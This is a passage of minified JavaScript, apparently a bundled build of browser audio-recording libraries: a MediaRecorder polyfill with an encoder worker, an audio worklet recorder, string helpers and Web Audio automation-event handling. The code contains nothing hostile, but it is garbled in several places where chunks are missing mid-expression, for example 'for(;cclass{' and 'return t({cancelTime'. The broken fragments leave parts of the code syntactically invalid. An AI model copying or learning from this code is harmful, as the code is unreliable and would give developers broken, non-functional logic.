async(e,r,n)=>{await t("record",{recordingId:e,sampleRate:r,typedArrays:n},n.map((e=>{let{buffer:t}=e;return t})))}}}),w=async(e,t)=>{const r=v(t),n=await r.characterize(),o=n.toString();if(e.has(o))throw new Error("There is already an encoder stored which handles exactly the same mime types.");return e.set(o,[n,r]),n},x=new Map,y=(e=>t=>{const r=e.get(t);if(void 0===r)throw new Error("There was no instance of an encoder stored with the given id.");return r})(x),M=((e,t)=>r=>{const n=t(r);return e.delete(r),n})(x,y),b=new Map,E=((e,t)=>r=>{const[n,o,a,s]=t(r);return a?new Promise((t=>{o.onmessage=a=>{let{data:i}=a;0===i.length?(e(o),t(n.encode(r,null))):n.record(r,s,i)}})):n.encode(r,null)})(m,M),A=(e=>t=>{for(const[r,n]of Array.from(e.values()))if(r.test(t))return n;throw new Error("There is no encoder registered which could handle the given mimeType.")})(b),_=((e,t,r)=>(n,o,a)=>{if(t.has(n))throw new Error('There is already an encoder registered with an id called "'.concat(n,'".'));const s=r(o),{port1:i,port2:c}=new MessageChannel,u=[s,i,!0,a];return t.set(n,u),i.onmessage=t=>{let{data:r}=t;0===r.length?(e(i),u[2]=!1):s.record(n,a,r)},c})(m,x,A),I=(e=>(t,r)=>{const[n]=e(t);return n.encode(t,r)})(y);p(self,{encode:async e=>{let{encoderId:t,timeslice:r}=e;const n=null===r?await E(t):await I(t,r);return{result:n,transferables:n}},instantiate:e=>{let{encoderId:t,mimeType:r,sampleRate:n}=e;const o=_(t,r,n);return{result:o,transferables:[o]}},register:async e=>{let{port:t}=e;return{result:await w(b,t)}}})})()})();`,fr=new Blob([dr],{type:"application/javascript; charset=utf-8"}),rn=URL.createObjectURL(fr),vt=lr(rn),Ue=vt.encode,on=vt.instantiate,hr=vt.register;URL.revokeObjectURL(rn);const pr=e=>(t,n)=>{if(e===null)throw new Error("A native BlobEvent could not be created.");return new e(t,n)},mr=(e,t)=>(n,r,o)=>{const s=[];let a=r,c=0;for(;cclass{constructor(r=null){this._listeners=new WeakMap,this._nativeEventTarget=r===null?e():r}addEventListener(r,o,s){if(o!==null){let a=this._listeners.get(o);a===void 0&&(a=t(this,o),typeof o=="function"&&this._listeners.set(o,a)),this._nativeEventTarget.addEventListener(r,a,s)}}dispatchEvent(r){return this._nativeEventTarget.dispatchEvent(r)}removeEventListener(r,o,s){const a=o===null?void 0:this._listeners.get(o);this._nativeEventTarget.removeEventListener(r,a===void 0?null:a,s)}},wr=e=>()=>{if(e===null)throw new Error("A native EventTarget could not be created.");return e.document.createElement("p")},_t=(e="")=>{try{return new DOMException(e,"InvalidModificationError")}catch(t){return t.code=13,t.message=e,t.name="InvalidModificationError",t}},vr=()=>{try{return new DOMException("","InvalidStateError")}catch(e){return e.code=11,e.name="InvalidStateError",e}},_r=e=>e!==null&&e.BlobEvent!==void 0&&e.MediaStream!==void 0&&(e.MediaRecorder===void 0||e.MediaRecorder.isTypeSupported!==void 0)?new Promise(t=>{if(e.MediaRecorder===void 0)return t(!0);const n=e.document.createElement("canvas");if(n.getContext("2d"),typeof n.captureStream!="function")return t(!1);const r=n.captureStream(),o="audio/webm";try{const s=new e.MediaRecorder(r,{mimeType:o});s.addEventListener("dataavailable",({data:a})=>t(a.type===o)),s.start(),setTimeout(()=>s.stop(),10)}catch(s){t(s.name==="NotSupportedError")}}):Promise.resolve(!1),yr=(e,t,n,r,o,s,a)=>class extends s{constructor(i,u={}){const{mimeType:d}=u;if(a!==null&&(d===void 0||a.isTypeSupported!==void 0&&a.isTypeSupported(d))){const l=e(a,i,u);super(l),this._internalMediaRecorder=l}else if(d!==void 0&&o.some(l=>l.test(d)))super(),a!==null&&a.isTypeSupported!==void 0&&a.isTypeSupported("audio/webm;codecs=pcm")?this._internalMediaRecorder=r(this,a,i,d):this._internalMediaRecorder=n(this,i,d);else throw a!==null&&e(a,i,u),t();this._ondataavailable=null,this._onerror=null,this._onpause=null,this._onresume=null,this._onstart=null,this._onstop=null}get mimeType(){return this._internalMediaRecorder.mimeType}get ondataavailable(){return this._ondataavailable===null?this._ondataavailable:this._ondataavailable[0]}set ondataavailable(i){if(this._ondataavailable!==null&&this.removeEventListener("dataavailable",this._ondataavailable[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("dataavailable",u),this._ondataavailable=[i,u]}else this._ondataavailable=null}get onerror(){return this._onerror===null?this._onerror:this._onerror[0]}set onerror(i){if(this._onerror!==null&&this.removeEventListener("error",this._onerror[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("error",u),this._onerror=[i,u]}else this._onerror=null}get onpause(){return this._onpause===null?this._onpause:this._onpause[0]}set onpause(i){if(this._onpause!==null&&this.removeEventListener("pause",this._onpause[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("pause",u),this._onpause=[i,u]}else this._onpause=null}get onresume(){return this._onresume===null?this._onresume:this._onresume[0]}set onresume(i){if(this._onresume!==null&&this.removeEventListener("resume",this._onresume[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("resume",u),this._onresume=[i,u]}else this._onresume=null}get onstart(){return this._onstart===null?this._onstart:this._onstart[0]}set onstart(i){if(this._onstart!==null&&this.removeEventListener("start",this._onstart[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("start",u),this._onstart=[i,u]}else this._onstart=null}get onstop(){return this._onstop===null?this._onstop:this._onstop[0]}set onstop(i){if(this._onstop!==null&&this.removeEventListener("stop",this._onstop[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("stop",u),this._onstop=[i,u]}else this._onstop=null}get state(){return this._internalMediaRecorder.state}pause(){return this._internalMediaRecorder.pause()}resume(){return this._internalMediaRecorder.resume()}start(i){return this._internalMediaRecorder.start(i)}stop(){return this._internalMediaRecorder.stop()}static isTypeSupported(i){return a!==null&&a.isTypeSupported!==void 0&&a.isTypeSupported(i)||o.some(u=>u.test(i))}},Er=e=>e!==null&&e.BlobEvent!==void 0?e.BlobEvent:null,Ar=(e,t)=>(n,r,o)=>{const s=[],a=new WeakMap,c=new WeakMap,i=new n(r,o),u=new WeakMap;let d=!0;return i.addEventListener=(l=>(h,m,w)=>{let f=m;return typeof m=="function"&&(h==="dataavailable"?(f=p=>{setTimeout(()=>{if(d&&i.state==="inactive")s.push(p.data);else{if(s.length>0){const g=p.data;Object.defineProperty(p,"data",{value:new Blob([...s,g],{type:g.type})}),s.length=0}m.call(i,p)}})},a.set(m,f)):h==="error"?(f=p=>{if(p.error===void 0)m.call(i,new ErrorEvent("error",{error:e()}));else if(p.error.name==="UnknownError"){const g=p.error.message;m.call(i,new ErrorEvent("error",{error:e(g)}))}else p instanceof ErrorEvent?m.call(i,p):m.call(i,new ErrorEvent("error",{error:p.error}))},c.set(m,f)):h==="stop"&&(f=p=>{d=!1,setTimeout(()=>m.call(i,p))},u.set(m,f))),l.call(i,h,f,w)})(i.addEventListener),i.dispatchEvent=(l=>h=>{let m;setTimeout(()=>{m=d,d=!1});const w=l.call(i,h);return setTimeout(()=>d=m),w})(i.dispatchEvent),i.removeEventListener=(l=>(h,m,w)=>{let f=m;if(typeof m=="function"){if(h==="dataavailable"){const p=a.get(m);p!==void 0&&(f=p)}else if(h==="error"){const p=c.get(m);p!==void 0&&(f=p)}else if(h==="stop"){const p=u.get(m);p!==void 0&&(f=p)}}return l.call(i,h,f,w)})(i.removeEventListener),i.start=(l=>h=>{if(o.mimeType!==void 0&&o.mimeType.startsWith("audio/")&&r.getVideoTracks().length>0)throw t();return d=h!==void 0,h===void 0?l.call(i):l.call(i,h)})(i.start),i},br=e=>e===null||e.MediaRecorder===void 0?null:e.MediaRecorder,$e=()=>{try{return new DOMException("","NotSupportedError")}catch(e){return e.code=9,e.name="NotSupportedError",e}},Cr=e=>(t,n,r,o=2)=>{const s=e(t,n);if(s===null)return s;const{length:a,value:c}=s;if(r==="master")return{content:null,length:a};if(n+a+c>t.byteLength)return null;if(r==="binary"){const i=(c/Float32Array.BYTES_PER_ELEMENT-1)/o,u=Array.from({length:o},()=>new Float32Array(i));for(let d=0;d(t,n)=>{const r=e(t,n);if(r===null)return r;const{length:o,value:s}=r;return s===35?{length:o,type:"binary"}:s===46||s===97||s===88713574||s===106212971||s===139690087||s===172351395||s===256095861?{length:o,type:"master"}:{length:o,type:"unknown"}},Nr=e=>(t,n)=>{const r=e(t,n);if(r===null)return r;const o=n+Math.floor((r-1)/8);if(o+r>t.byteLength)return null;let a=t.getUint8(o)&(1<<8-r%8)-1;for(let c=1;c{},Bt=e=>{throw e};function Or(e){return e?e.next&&e.error&&e.complete?e:{complete:(e.complete??ke).bind(e),error:(e.error??Bt).bind(e),next:(e.next??ke).bind(e)}:{complete:ke,error:Bt,next:ke}}const Sr=e=>(t,n,r)=>e(o=>{const s=a=>o.next(a);return t.addEventListener(n,s,r),()=>t.removeEventListener(n,s,r)}),Rr=(e,t)=>{const n=()=>{},r=o=>typeof o[0]=="function";return o=>{const s=(...a)=>{const c=o(r(a)?t({next:a[0]}):t(...a));return c!==void 0?c:n};return s[Symbol.observable]=()=>({subscribe:(...a)=>({unsubscribe:s(...a)})}),e(s)}},Ir=Rr(Mr,Or),sn=Sr(Ir);/*! - * dashify - * - * Copyright (c) 2015-2017, Jon Schlinkert. - * Released under the MIT License. - */var kr=(e,t)=>{if(typeof e!="string")throw new TypeError("expected a string");return e.trim().replace(/([a-z])([A-Z])/g,"$1-$2").replace(/\W/g,n=>/[À-ž]/.test(n)?n:"-").replace(/^-+|-+$/g,"").replace(/-{2,}/g,n=>t&&t.condense?"-":n).toLowerCase()};const Lr=nn(kr);var an={exports:{}};(function(e){var t=function(n){var r,o,s=/\w+/.exec(n);if(s)o=s[0];else return"an";var a=o.toLowerCase(),c=["honest","hour","hono"];for(r in c)if(a.indexOf(c[r])==0)return"an";if(a.length==1)return"aedhilmnorsx".indexOf(a)>=0?"an":"a";if(o.match(/(?!FJO|[HLMNS]Y.|RY[EO]|SQU|(F[LR]?|[HL]|MN?|N|RH?|S[CHKLMNPTVW]?|X(YL)?)[AEIOU])[FHLMNRSX][A-Z]/))return"an";var i=[/^e[uw]/,/^onc?e\b/,/^uni([^nmd]|mo)/,/^u[bcfhjkqrst][aeiou]/];for(r=0;r=0?"an":"a":"aeiou".indexOf(a[0])>=0||a.match(/^y(b[lor]|cl[ea]|fere|gg|p[ios]|rou|tt)/)?"an":"a"};e.exports=t})(an);var Pr=an.exports;const xr=nn(Pr),Dt=(e,t)=>t===void 0?e:t.reduce((n,r)=>{if(r==="capitalize"){const o=n.charAt(0).toUpperCase(),s=n.slice(1);return`${o}${s}`}return r==="dashify"?Lr(n):r==="prependIndefiniteArticle"?`${xr(n)} ${n}`:n},e),Ur=e=>{const t=e.name+e.modifiers.map(n=>`\\.${n}\\(\\)`).join("");return new RegExp(`\\$\\{${t}}`,"g")},Wt=(e,t)=>{const n=/\${([^.}]+)((\.[^(]+\(\))*)}/g,r=[];let o=n.exec(e);for(;o!==null;){const a={modifiers:[],name:o[1]};if(o[3]!==void 0){const c=/\.[^(]+\(\)/g;let i=c.exec(o[2]);for(;i!==null;)a.modifiers.push(i[0].slice(1,-2)),i=c.exec(o[2])}r.push(a),o=n.exec(e)}const s=r.reduce((a,c)=>a.map(i=>typeof i=="string"?i.split(Ur(c)).reduce((u,d,l)=>l===0?[d]:c.name in t?[...u,Dt(t[c.name],c.modifiers),d]:[...u,h=>Dt(h[c.name],c.modifiers),d],[]):[i]).reduce((i,u)=>[...i,...u],[]),[e]);return a=>s.reduce((c,i)=>typeof i=="string"?[...c,i]:[...c,i(a)],[]).join("")},Ge=(e,t={})=>{const n=e.code===void 0?void 0:Wt(e.code,t),r=e.message===void 0?void 0:Wt(e.message,t);function o(s={},a){const c=a===void 0&&(s instanceof Error||s.code!==void 0&&s.code.slice(-9)==="Exception"),{cause:i,missingParameters:u}=c?{cause:s,missingParameters:{}}:{cause:a,missingParameters:s},d=r===void 0?new Error:new Error(r(u));return i!==null&&(d.cause=i),n!==void 0&&(d.code=n(u)),e.status!==void 0&&(d.status=e.status),d}return o},ze={INTERNAL_ERROR:-32603,INVALID_PARAMS:-32602,METHOD_NOT_FOUND:-32601};Ge({message:'The requested method called "${method}" is not supported.',status:ze.METHOD_NOT_FOUND});Ge({message:'The handler of the method called "${method}" returned no required result.',status:ze.INTERNAL_ERROR});Ge({message:'The handler of the method called "${method}" returned an unexpected result.',status:ze.INTERNAL_ERROR});Ge({message:'The specified parameter called "portId" with the given value "${portId}" does not identify a port connected to this worker.',status:ze.INVALID_PARAMS});const Br=(e,t,n)=>async r=>{const o=new e([n],{type:"application/javascript; charset=utf-8"}),s=t.createObjectURL(o);try{await r(s)}finally{t.revokeObjectURL(s)}},Dr=e=>({data:t})=>{const{id:n}=t;if(n!==null){const r=e.get(n);if(r!==void 0){const{reject:o,resolve:s}=r;e.delete(n),t.error===void 0?s(t.result):o(new Error(t.error.message))}}},Wr=e=>(t,n)=>(r,o=[])=>new Promise((s,a)=>{const c=e(t);t.set(c,{reject:a,resolve:s}),n.postMessage({id:c,...r},o)}),Vr=(e,t,n,r)=>(o,s,a={})=>{const c=new o(s,"recorder-audio-worklet-processor",{...a,channelCountMode:"explicit",numberOfInputs:1,numberOfOutputs:0}),i=new Map,u=t(i,c.port),d=n(c.port,"message")(e(i));c.port.start();let l="inactive";return Object.defineProperties(c,{pause:{get(){return async()=>(r(["recording"],l),l="paused",u({method:"pause"}))}},port:{get(){throw new Error("The port of a RecorderAudioWorkletNode can't be accessed.")}},record:{get(){return async h=>(r(["inactive"],l),l="recording",u({method:"record",params:{encoderPort:h}},[h]))}},resume:{get(){return async()=>(r(["paused"],l),l="recording",u({method:"resume"}))}},stop:{get(){return async()=>{r(["paused","recording"],l),l="stopped";try{await u({method:"stop"})}finally{d()}}}}}),c},Fr=(e,t)=>{if(!e.includes(t))throw new Error(`Expected the state to be ${e.map(n=>`"${n}"`).join(" or ")} but it was "${t}".`)},jr='(()=>{"use strict";class e extends AudioWorkletProcessor{constructor(){super(),this._encoderPort=null,this._state="inactive",this.port.onmessage=e=>{let{data:t}=e;"pause"===t.method?"active"===this._state||"recording"===this._state?(this._state="paused",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"record"===t.method?"inactive"===this._state?(this._encoderPort=t.params.encoderPort,this._state="active",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"resume"===t.method?"paused"===this._state?(this._state="active",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"stop"===t.method?"active"!==this._state&&"paused"!==this._state&&"recording"!==this._state||null===this._encoderPort?this._sendUnexpectedStateError(t.id):(this._stop(this._encoderPort),this._sendAcknowledgement(t.id)):"number"==typeof t.id&&this.port.postMessage({error:{code:-32601,message:"The requested method is not supported."},id:t.id})}}process(e){let[t]=e;if("inactive"===this._state||"paused"===this._state)return!0;if("active"===this._state){if(void 0===t)throw new Error("No channelData was received for the first input.");if(0===t.length)return!0;this._state="recording"}if("recording"===this._state&&null!==this._encoderPort){if(void 0===t)throw new Error("No channelData was received for the first input.");if(0!==t.length)return this._encoderPort.postMessage(t,t.map((e=>{let{buffer:t}=e;return t}))),!0;this._stop(this._encoderPort)}return!1}_sendAcknowledgement(e){this.port.postMessage({id:e,result:null})}_sendUnexpectedStateError(e){this.port.postMessage({error:{code:-32603,message:"The internal state does not allow to process the given message."},id:e})}_stop(e){e.postMessage([]),e.close(),this._encoderPort=null,this._state="stopped"}}e.parameterDescriptors=[],registerProcessor("recorder-audio-worklet-processor",e)})();',$r=Br(Blob,URL,jr),Gr=Vr(Dr,Wr(cr),sn,Fr),Vt=(e,t,n)=>({endTime:t,insertTime:n,type:"exponentialRampToValue",value:e}),Ft=(e,t,n)=>({endTime:t,insertTime:n,type:"linearRampToValue",value:e}),at=(e,t)=>({startTime:t,type:"setValue",value:e}),cn=(e,t,n)=>({duration:n,startTime:t,type:"setValueCurve",values:e}),un=(e,t,{startTime:n,target:r,timeConstant:o})=>r+(t-r)*Math.exp((n-e)/o),ge=e=>e.type==="exponentialRampToValue",Be=e=>e.type==="linearRampToValue",oe=e=>ge(e)||Be(e),yt=e=>e.type==="setValue",te=e=>e.type==="setValueCurve",De=(e,t,n,r)=>{const o=e[t];return o===void 0?r:oe(o)||yt(o)?o.value:te(o)?o.values[o.values.length-1]:un(n,De(e,t-1,o.startTime,r),o)},jt=(e,t,n,r,o)=>n===void 0?[r.insertTime,o]:oe(n)?[n.endTime,n.value]:yt(n)?[n.startTime,n.value]:te(n)?[n.startTime+n.duration,n.values[n.values.length-1]]:[n.startTime,De(e,t-1,n.startTime,o)],it=e=>e.type==="cancelAndHold",ct=e=>e.type==="cancelScheduledValues",re=e=>it(e)||ct(e)?e.cancelTime:ge(e)||Be(e)?e.endTime:e.startTime,$t=(e,t,n,{endTime:r,value:o})=>n===o?o:0n+(e-t)/(r-t)*(o-n),zr=(e,t)=>{const n=Math.floor(t),r=Math.ceil(t);return n===r?e[n]:(1-(t-n))*e[n]+(1-(r-t))*e[r]},qr=(e,{duration:t,startTime:n,values:r})=>{const o=(e-n)/t*(r.length-1);return zr(r,o)},Le=e=>e.type==="setTarget";class Hr{constructor(t){this._automationEvents=[],this._currenTime=0,this._defaultValue=t}[Symbol.iterator](){return this._automationEvents[Symbol.iterator]()}add(t){const n=re(t);if(it(t)||ct(t)){const r=this._automationEvents.findIndex(s=>ct(t)&&te(s)?s.startTime+s.duration>=n:re(s)>=n),o=this._automationEvents[r];if(r!==-1&&(this._automationEvents=this._automationEvents.slice(0,r)),it(t)){const s=this._automationEvents[this._automationEvents.length-1];if(o!==void 0&&oe(o)){if(Le(s))throw new Error("The internal list is malformed.");const a=te(s)?s.startTime+s.duration:re(s),c=te(s)?s.values[s.values.length-1]:s.value,i=ge(o)?$t(n,a,c,o):Gt(n,a,c,o),u=ge(o)?Vt(i,n,this._currenTime):Ft(i,n,this._currenTime);this._automationEvents.push(u)}s!==void 0&&Le(s)&&this._automationEvents.push(at(this.getValue(n),n)),s!==void 0&&te(s)&&s.startTime+s.duration>n&&(this._automationEvents[this._automationEvents.length-1]=cn(new Float32Array([6,7]),s.startTime,n-s.startTime))}}else{const r=this._automationEvents.findIndex(a=>re(a)>n),o=r===-1?this._automationEvents[this._automationEvents.length-1]:this._automationEvents[r-1];if(o!==void 0&&te(o)&&re(o)+o.duration>n)return!1;const s=ge(t)?Vt(t.value,t.endTime,this._currenTime):Be(t)?Ft(t.value,n,this._currenTime):t;if(r===-1)this._automationEvents.push(s);else{if(te(t)&&n+t.duration>re(this._automationEvents[r]))return!1;this._automationEvents.splice(r,0,s)}}return!0}flush(t){const n=this._automationEvents.findIndex(r=>re(r)>t);if(n>1){const r=this._automationEvents.slice(n-1),o=r[0];Le(o)&&r.unshift(at(De(this._automationEvents,n-2,o.startTime,this._defaultValue),o.startTime)),this._automationEvents=r}}getValue(t){if(this._automationEvents.length===0)return this._defaultValue;const n=this._automationEvents.findIndex(a=>re(a)>t),r=this._automationEvents[n],o=(n===-1?this._automationEvents.length:n)-1,s=this._automationEvents[o];if(s!==void 0&&Le(s)&&(r===void 0||!oe(r)||r.insertTime>t))return un(t,De(this._automationEvents,o-1,s.startTime,this._defaultValue),s);if(s!==void 0&&yt(s)&&(r===void 0||!oe(r)))return s.value;if(s!==void 0&&te(s)&&(r===void 0||!oe(r)||s.startTime+s.duration>t))return t({cancelTime:e,type:"cancelAndHold"}),Xr=e=>({cancelTime:e,type:"cancelScheduledValues"}),Zr=(e,t)=>({endTime:t,type:"exponentialRampToValue",value:e}),Kr=(e,t)=>({endTime:t,type:"linearRampToValue",value:e}),Jr=(e,t,n)=>({startTime:t,target:e,timeConstant:n,type:"setTarget"}),Qr=()=>new DOMException("","AbortError"),eo=e=>(t,n,[r,o,s],a)=>{e(t[o],[n,r,s],c=>c[0]===n&&c[1]===r,a)},to=e=>(t,n,r)=>{const o=[];for(let s=0;s(t,n)=>{e.set(t,{activeInputs:new Set,passiveInputs:new WeakMap,renderer:n})},we=new WeakSet,ln=new WeakMap,dn=new WeakMap,fn=new WeakMap,hn=new WeakMap,pn=new WeakMap,mn=new WeakMap,ut=new WeakMap,lt=new WeakMap,dt=new WeakMap,gn={construct(){return gn}},ro=e=>{try{const t=new Proxy(e,gn);new t}catch{return!1}return!0},zt=/^import(?:(?:[\s]+[\w]+|(?:[\s]+[\w]+[\s]*,)?[\s]*\{[\s]*[\w]+(?:[\s]+as[\s]+[\w]+)?(?:[\s]*,[\s]*[\w]+(?:[\s]+as[\s]+[\w]+)?)*[\s]*}|(?:[\s]+[\w]+[\s]*,)?[\s]*\*[\s]+as[\s]+[\w]+)[\s]+from)?(?:[\s]*)("([^"\\]|\\.)+"|'([^'\\]|\\.)+')(?:[\s]*);?/,qt=(e,t)=>{const n=[];let r=e.replace(/^[\s]+/,""),o=r.match(zt);for(;o!==null;){const s=o[1].slice(1,-1),a=o[0].replace(/([\s]+)?;?$/,"").replace(s,new URL(s,t).toString());n.push(a),r=r.slice(o[0].length).replace(/^[\s]+/,""),o=r.match(zt)}return[n.join(";"),r]},Ht=e=>{if(e!==void 0&&!Array.isArray(e))throw new TypeError("The parameterDescriptors property of given value for processorCtor is not an array.")},Yt=e=>{if(!ro(e))throw new TypeError("The given value for processorCtor should be a constructor.");if(e.prototype===null||typeof e.prototype!="object")throw new TypeError("The given value for processorCtor should have a prototype.")},oo=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>{let m=0;return(w,f,p={credentials:"omit"})=>{const g=d.get(w);if(g!==void 0&&g.has(f))return Promise.resolve();const v=u.get(w);if(v!==void 0){const _=v.get(f);if(_!==void 0)return _}const A=s(w),T=A.audioWorklet===void 0?o(f).then(([_,E])=>{const[y,C]=qt(_,E),M=`${y};((a,b)=>{(a[b]=a[b]||[]).push((AudioWorkletProcessor,global,registerProcessor,sampleRate,self,window)=>{${C} -})})(window,'_AWGS')`;return n(M)}).then(()=>{const _=h._AWGS.pop();if(_===void 0)throw new SyntaxError;r(A.currentTime,A.sampleRate,()=>_(class{},void 0,(E,y)=>{if(E.trim()==="")throw t();const C=lt.get(A);if(C!==void 0){if(C.has(E))throw t();Yt(y),Ht(y.parameterDescriptors),C.set(E,y)}else Yt(y),Ht(y.parameterDescriptors),lt.set(A,new Map([[E,y]]))},A.sampleRate,void 0,void 0))}):Promise.all([o(f),Promise.resolve(e(l,l))]).then(([[_,E],y])=>{const C=m+1;m=C;const[M,I]=qt(_,E),B=`${M};((AudioWorkletProcessor,registerProcessor)=>{${I} -})(${y?"AudioWorkletProcessor":"class extends AudioWorkletProcessor {__b=new WeakSet();constructor(){super();(p=>p.postMessage=(q=>(m,t)=>q.call(p,m,t?t.filter(u=>!this.__b.has(u)):t))(p.postMessage))(this.port)}}"},(n,p)=>registerProcessor(n,class extends p{${y?"":"__c = (a) => a.forEach(e=>this.__b.add(e.buffer));"}process(i,o,p){${y?"":"i.forEach(this.__c);o.forEach(this.__c);this.__c(Object.values(p));"}return super.process(i.map(j=>j.some(k=>k.length===0)?[]:j),o,p)}}));registerProcessor('__sac${C}',class extends AudioWorkletProcessor{process(){return !1}})`,U=new Blob([B],{type:"application/javascript; charset=utf-8"}),R=URL.createObjectURL(U);return A.audioWorklet.addModule(R,p).then(()=>{if(c(A))return A;const x=a(A);return x.audioWorklet.addModule(R,p).then(()=>x)}).then(x=>{if(i===null)throw new SyntaxError;try{new i(x,`__sac${C}`)}catch{throw new SyntaxError}}).finally(()=>URL.revokeObjectURL(R))});return v===void 0?u.set(w,new Map([[f,T]])):v.set(f,T),T.then(()=>{const _=d.get(w);_===void 0?d.set(w,new Set([f])):_.add(f)}).finally(()=>{const _=u.get(w);_!==void 0&&_.delete(f)}),T}},K=(e,t)=>{const n=e.get(t);if(n===void 0)throw new Error("A value with the given key could not be found.");return n},qe=(e,t)=>{const n=Array.from(e).filter(t);if(n.length>1)throw Error("More than one element was found.");if(n.length===0)throw Error("No element was found.");const[r]=n;return e.delete(r),r},wn=(e,t,n,r)=>{const o=K(e,t),s=qe(o,a=>a[0]===n&&a[1]===r);return o.size===0&&e.delete(t),s},be=e=>K(mn,e),ye=e=>{if(we.has(e))throw new Error("The AudioNode is already stored.");we.add(e),be(e).forEach(t=>t(!0))},vn=e=>"port"in e,He=e=>{if(!we.has(e))throw new Error("The AudioNode is not stored.");we.delete(e),be(e).forEach(t=>t(!1))},ft=(e,t)=>{!vn(e)&&t.every(n=>n.size===0)&&He(e)},so=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>{const m=new WeakMap;return(w,f,p,g,v)=>{const{activeInputs:A,passiveInputs:T}=s(f),{outputs:_}=s(w),E=c(w),y=C=>{const M=i(f),I=i(w);if(C){const N=wn(T,w,p,g);e(A,w,N,!1),!v&&!l(w)&&n(I,M,p,g),h(f)&&ye(f)}else{const N=r(A,w,p,g);t(T,g,N,!1),!v&&!l(w)&&o(I,M,p,g);const P=a(f);if(P===0)d(f)&&ft(f,A);else{const k=m.get(f);k!==void 0&&clearTimeout(k),m.set(f,setTimeout(()=>{d(f)&&ft(f,A)},P*1e3))}}};return u(_,[f,p,g],C=>C[0]===f&&C[1]===p&&C[2]===g,!0)?(E.add(y),d(w)?e(A,w,[p,g,y],!0):t(T,g,[w,p,y],!0),!0):!1}},ao=e=>(t,n,[r,o,s],a)=>{const c=t.get(r);c===void 0?t.set(r,new Set([[o,n,s]])):e(c,[o,n,s],i=>i[0]===o&&i[1]===n,a)},io=e=>(t,n)=>{const r=e(t,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});n.connect(r).connect(t.destination);const o=()=>{n.removeEventListener("ended",o),n.disconnect(r),r.disconnect()};n.addEventListener("ended",o)},co=e=>(t,n)=>{e(t).add(n)},Et=(e,t)=>e.context===t,ht=e=>{try{e.copyToChannel(new Float32Array(1),0,-1)}catch{return!1}return!0},ie=()=>new DOMException("","IndexSizeError"),_n=e=>{e.getChannelData=(t=>n=>{try{return t.call(e,n)}catch(r){throw r.code===12?ie():r}})(e.getChannelData)},uo={numberOfChannels:1},lo=(e,t,n,r,o,s,a,c)=>{let i=null;return class yn{constructor(d){if(o===null)throw new Error("Missing the native OfflineAudioContext constructor.");const{length:l,numberOfChannels:h,sampleRate:m}={...uo,...d};i===null&&(i=new o(1,1,44100));const w=r!==null&&t(s,s)?new r({length:l,numberOfChannels:h,sampleRate:m}):i.createBuffer(h,l,m);if(w.numberOfChannels===0)throw n();return typeof w.copyFromChannel!="function"?(a(w),_n(w)):t(ht,()=>ht(w))||c(w),e.add(w),w}static[Symbol.hasInstance](d){return d!==null&&typeof d=="object"&&Object.getPrototypeOf(d)===yn.prototype||e.has(d)}}},Ce=-34028234663852886e22,Ye=-Ce,se=e=>we.has(e),fo={buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1},ho=(e,t,n,r,o,s,a,c)=>class extends e{constructor(u,d){const l=s(u),h={...fo,...d},m=o(l,h),w=a(l),f=w?t():null;super(u,!1,m,f),this._audioBufferSourceNodeRenderer=f,this._isBufferNullified=!1,this._isBufferSet=h.buffer!==null,this._nativeAudioBufferSourceNode=m,this._onended=null,this._playbackRate=n(this,w,m.playbackRate,Ye,Ce)}get buffer(){return this._isBufferNullified?null:this._nativeAudioBufferSourceNode.buffer}set buffer(u){if(this._nativeAudioBufferSourceNode.buffer=u,u!==null){if(this._isBufferSet)throw r();this._isBufferSet=!0}}get loop(){return this._nativeAudioBufferSourceNode.loop}set loop(u){this._nativeAudioBufferSourceNode.loop=u}get loopEnd(){return this._nativeAudioBufferSourceNode.loopEnd}set loopEnd(u){this._nativeAudioBufferSourceNode.loopEnd=u}get loopStart(){return this._nativeAudioBufferSourceNode.loopStart}set loopStart(u){this._nativeAudioBufferSourceNode.loopStart=u}get onended(){return this._onended}set onended(u){const d=typeof u=="function"?c(this,u):null;this._nativeAudioBufferSourceNode.onended=d;const l=this._nativeAudioBufferSourceNode.onended;this._onended=l!==null&&l===d?u:l}get playbackRate(){return this._playbackRate}start(u=0,d=0,l){if(this._nativeAudioBufferSourceNode.start(u,d,l),this._audioBufferSourceNodeRenderer!==null&&(this._audioBufferSourceNodeRenderer.start=l===void 0?[u,d]:[u,d,l]),this.context.state!=="closed"){ye(this);const h=()=>{this._nativeAudioBufferSourceNode.removeEventListener("ended",h),se(this)&&He(this)};this._nativeAudioBufferSourceNode.addEventListener("ended",h)}}stop(u=0){this._nativeAudioBufferSourceNode.stop(u),this._audioBufferSourceNodeRenderer!==null&&(this._audioBufferSourceNodeRenderer.stop=u)}},po=(e,t,n,r,o)=>()=>{const s=new WeakMap;let a=null,c=null;const i=async(u,d)=>{let l=n(u);const h=Et(l,d);if(!h){const m={buffer:l.buffer,channelCount:l.channelCount,channelCountMode:l.channelCountMode,channelInterpretation:l.channelInterpretation,loop:l.loop,loopEnd:l.loopEnd,loopStart:l.loopStart,playbackRate:l.playbackRate.value};l=t(d,m),a!==null&&l.start(...a),c!==null&&l.stop(c)}return s.set(d,l),h?await e(d,u.playbackRate,l.playbackRate):await r(d,u.playbackRate,l.playbackRate),await o(u,d,l),l};return{set start(u){a=u},set stop(u){c=u},render(u,d){const l=s.get(d);return l!==void 0?Promise.resolve(l):i(u,d)}}},mo=e=>"playbackRate"in e,go=e=>"frequency"in e&&"gain"in e,wo=e=>"offset"in e,vo=e=>!("frequency"in e)&&"gain"in e,_o=e=>"detune"in e&&"frequency"in e,yo=e=>"pan"in e,q=e=>K(ln,e),Te=e=>K(fn,e),pt=(e,t)=>{const{activeInputs:n}=q(e);n.forEach(o=>o.forEach(([s])=>{t.includes(e)||pt(s,[...t,e])}));const 